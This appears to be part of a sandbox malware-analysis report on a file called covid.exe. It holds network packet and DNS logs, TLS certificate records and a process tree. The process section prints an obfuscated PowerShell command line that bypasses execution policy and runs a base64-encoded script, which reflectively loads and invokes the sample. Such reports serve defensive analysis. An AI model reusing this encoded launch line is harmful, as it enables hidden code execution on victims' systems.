                                                                                                                                                                    Apr 1, 2021 08:04:41.053183079 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053203106 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053203106 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.053215027 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.053221941 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053236961 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.053241014 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053256989 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053263903 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.053273916 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053291082 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053297997 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.053308010 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053325891 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053330898 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.053360939 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.053401947 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.055100918 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055134058 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055146933 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055159092 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055176020 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055192947 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055212021 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055221081 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.055228949 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055246115 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055250883 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.055262089 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055279970 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055291891 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.055295944 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055313110 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055319071 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.055329084 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055356026 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.055389881 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:47.307346106 CEST49735443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.307522058 CEST49734443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.358891010 CEST44349735172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.358993053 CEST49735443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.359214067 CEST44349734172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.360271931 CEST49734443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.410121918 CEST49735443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.411181927 CEST49734443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.461678982 CEST44349735172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.462723970 CEST44349734172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.474253893 CEST44349735172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.474281073 CEST44349735172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.474298000 CEST44349735172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.474411964 CEST49735443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.474442959 CEST49735443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.476510048 CEST44349734172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.476530075 CEST44349734172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.476542950 CEST44349734172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.476687908 CEST49734443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.476721048 CEST49734443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.529241085 CEST49735443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.529334068 CEST49734443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.530327082 CEST49735443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.546705961 CEST49734443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.546734095 CEST49735443192.168.2.3172.217.168.2

                                                                                                                                                                    UDP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Apr 1, 2021 08:04:15.355412006 CEST5128153192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:15.404179096 CEST53512818.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:16.143980980 CEST4919953192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:16.192631006 CEST53491998.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:17.409135103 CEST5062053192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:17.455265999 CEST53506208.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:18.634052992 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:18.695491076 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:19.036055088 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:19.081823111 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:20.321994066 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:20.371679068 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:36.305835962 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:36.352870941 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:36.366218090 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:36.408957958 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:37.817792892 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:37.875169039 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:38.244921923 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:38.290719986 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:38.682712078 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:38.739806890 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:38.991694927 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:39.001890898 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:39.047735929 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:39.050292969 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:40.378832102 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:40.436115026 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:40.640542030 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:40.689522982 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:40.822742939 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:40.881469011 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.165626049 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:41.181220055 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:41.219666004 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.238560915 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.410459042 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:41.464803934 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.496211052 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:41.538640022 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:41.552088976 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.611205101 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.814378977 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:41.860580921 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.223097086 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:47.286909103 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.418764114 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:47.496689081 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.520133972 CEST5303453192.168.2.38.8.8.8

                                                                                                                                                                    DNS Queries

                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                    Apr 1, 2021 08:04:36.352870941 CEST192.168.2.38.8.8.80xb74fStandard query (0)www.who.intA (IP address)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:37.817792892 CEST192.168.2.38.8.8.80x16c7Standard query (0)www.who.intA (IP address)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:38.244921923 CEST192.168.2.38.8.8.80x7923Standard query (0)use.fontawesome.comA (IP address)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:38.682712078 CEST192.168.2.38.8.8.80x1bc6Standard query (0)cdn.who.intA (IP address)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:38.991694927 CEST192.168.2.38.8.8.80x9aa3Standard query (0)s7.addthis.comA (IP address)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:39.001890898 CEST192.168.2.38.8.8.80xd4abStandard query (0)platform.twitter.comA (IP address)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:40.640542030 CEST192.168.2.38.8.8.80x1297Standard query (0)www.youtube.comA (IP address)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:40.822742939 CEST192.168.2.38.8.8.80xdea7Standard query (0)z.moatads.comA (IP address)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:41.181220055 CEST192.168.2.38.8.8.80xc34bStandard query (0)www.clarity.msA (IP address)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:41.410459042 CEST192.168.2.38.8.8.80x34afStandard query (0)v1.addthisedge.comA (IP address)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:41.496211052 CEST192.168.2.38.8.8.80x11c4Standard query (0)m.addthis.comA (IP address)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:41.538640022 CEST192.168.2.38.8.8.80x25fdStandard query (0)c.clarity.msA (IP address)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:47.223097086 CEST192.168.2.38.8.8.80xa541Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:47.418764114 CEST192.168.2.38.8.8.80x83aeStandard query (0)static.doubleclick.netA (IP address)IN (0x0001)

                                                                                                                                                                    DNS Answers

                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                    Apr 1, 2021 08:04:36.408957958 CEST8.8.8.8192.168.2.30xb74fNo error (0)www.who.intwww.who.int.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:37.875169039 CEST8.8.8.8192.168.2.30x16c7No error (0)www.who.intwww.who.int.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:38.290719986 CEST8.8.8.8192.168.2.30x7923No error (0)use.fontawesome.comfontawesome-cdn.fonticons.netdna-cdn.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:38.290719986 CEST8.8.8.8192.168.2.30x7923No error (0)fontawesome-cdn.fonticons.netdna-cdn.com23.111.9.35A (IP address)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:38.739806890 CEST8.8.8.8192.168.2.30x1bc6No error (0)cdn.who.intcdn.who.int.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:39.047735929 CEST8.8.8.8192.168.2.30xd4abNo error (0)platform.twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:39.047735929 CEST8.8.8.8192.168.2.30xd4abNo error (0)platform.twitter.map.fastly.net199.232.136.157A (IP address)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:39.050292969 CEST8.8.8.8192.168.2.30x9aa3No error (0)s7.addthis.coms8.addthis.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:39.050292969 CEST8.8.8.8192.168.2.30x9aa3No error (0)s8.addthis.comds-s7.addthis.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:40.689522982 CEST8.8.8.8192.168.2.30x1297No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:40.881469011 CEST8.8.8.8192.168.2.30xdea7No error (0)z.moatads.comwildcard.moatads.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:41.238560915 CEST8.8.8.8192.168.2.30xc34bNo error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:41.238560915 CEST8.8.8.8192.168.2.30xc34bNo error (0)clarity.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:41.464803934 CEST8.8.8.8192.168.2.30x34afNo error (0)v1.addthisedge.comv1.addthisedge.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:41.552088976 CEST8.8.8.8192.168.2.30x11c4No error (0)m.addthis.comm.addthisedge.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:41.552088976 CEST8.8.8.8192.168.2.30x11c4No error (0)m.addthisedge.comds-m.addthisedge.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:41.611205101 CEST8.8.8.8192.168.2.30x25fdNo error (0)c.clarity.msc.msn.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:41.611205101 CEST8.8.8.8192.168.2.30x25fdNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:47.286909103 CEST8.8.8.8192.168.2.30xa541No error (0)googleads.g.doubleclick.net172.217.168.2A (IP address)IN (0x0001)
                                                                                                                                                                    Apr 1, 2021 08:04:47.496689081 CEST8.8.8.8192.168.2.30x83aeNo error (0)static.doubleclick.netstatic-doubleclick-net.l.google.comCNAME (Canonical name)IN (0x0001)

                                                                                                                                                                    HTTPS Packets

                                                                                                                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                    Apr 1, 2021 08:04:38.866100073 CEST23.111.9.35443192.168.2.349708CN=*.fontawesome.com, O=Fonticons Inc, L=Bentonville, ST=Arkansas, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Nov 13 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020 Fri Nov 10 01:00:00 CET 2006Wed Dec 15 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030 Mon Nov 10 01:00:00 CET 2031771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                    CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                    CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Nov 10 01:00:00 CET 2006Mon Nov 10 01:00:00 CET 2031
                                                                                                                                                                    Apr 1, 2021 08:04:38.867270947 CEST23.111.9.35443192.168.2.349709CN=*.fontawesome.com, O=Fonticons Inc, L=Bentonville, ST=Arkansas, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Nov 13 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020 Fri Nov 10 01:00:00 CET 2006Wed Dec 15 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030 Mon Nov 10 01:00:00 CET 2031771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                    CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                    CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Nov 10 01:00:00 CET 2006Mon Nov 10 01:00:00 CET 2031
                                                                                                                                                                    Apr 1, 2021 08:04:39.129425049 CEST199.232.136.157443192.168.2.349712CN=platform.twitter.com, OU=Twitter Security, O="Twitter, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Aug 13 02:00:00 CEST 2020 Tue Oct 22 14:00:00 CEST 2013Wed Aug 18 14:00:00 CEST 2021 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                    CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                                    Apr 1, 2021 08:04:39.130176067 CEST199.232.136.157443192.168.2.349713CN=platform.twitter.com, OU=Twitter Security, O="Twitter, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Aug 13 02:00:00 CEST 2020 Tue Oct 22 14:00:00 CEST 2013Wed Aug 18 14:00:00 CEST 2021 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                    CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                                    Apr 1, 2021 08:04:47.474281073 CEST172.217.168.2443192.168.2.349735CN=*.g.doubleclick.net, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Mar 11 15:54:02 CET 2021 Thu Jun 15 02:00:42 CEST 2017Thu Jun 03 16:54:01 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                    CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                                    Apr 1, 2021 08:04:47.476530075 CEST172.217.168.2443192.168.2.349734CN=*.g.doubleclick.net, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Mar 11 15:54:02 CET 2021 Thu Jun 15 02:00:42 CEST 2017Thu Jun 03 16:54:01 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                    CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021

                                                                                                                                                                    Code Manipulations

                                                                                                                                                                    Statistics

                                                                                                                                                                    CPU Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Memory Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                    Behavior

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    System Behavior

                                                                                                                                                                    Analysis Process: covid.exe PID: 5760 Parent PID: 5552

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:04:22
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Users\user\Desktop\covid.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:'C:\Users\user\Desktop\covid.exe'
                                                                                                                                                                    Imagebase:0xc70000
                                                                                                                                                                    File size:5253560 bytes
                                                                                                                                                                    MD5 hash:A990C03D14BEF241E880D6167FA5A6AA
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: powershell.exe PID: 5720 Parent PID: 5760

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:04:24
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A
                                                                                                                                                                    Imagebase:0x7ff785e30000
                                                                                                                                                                    File size:447488 bytes
                                                                                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                    Has elevated privileges:true
